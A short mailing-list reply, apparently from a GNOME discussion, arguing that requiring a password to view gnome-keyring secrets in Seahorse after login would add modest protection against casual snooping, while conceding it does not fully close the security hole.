Re: gnome-keyring Passwords freely available after login

Hi Florian,

I beg to differ. Requiring a password improves the security of the system. Many users don't know about Seahorse, and probably don't care. Leaving the passwords openly available will not educate them in any way. But this proposed addition would prevent a casual snoop from picking their passwords.

I agree we are not "closing the security hole", because an attacker can use your nice little script, or any other method, to access the secrets. But we are adding *some* security. How much depends very much on user behavior.

Thanks,
    Yaron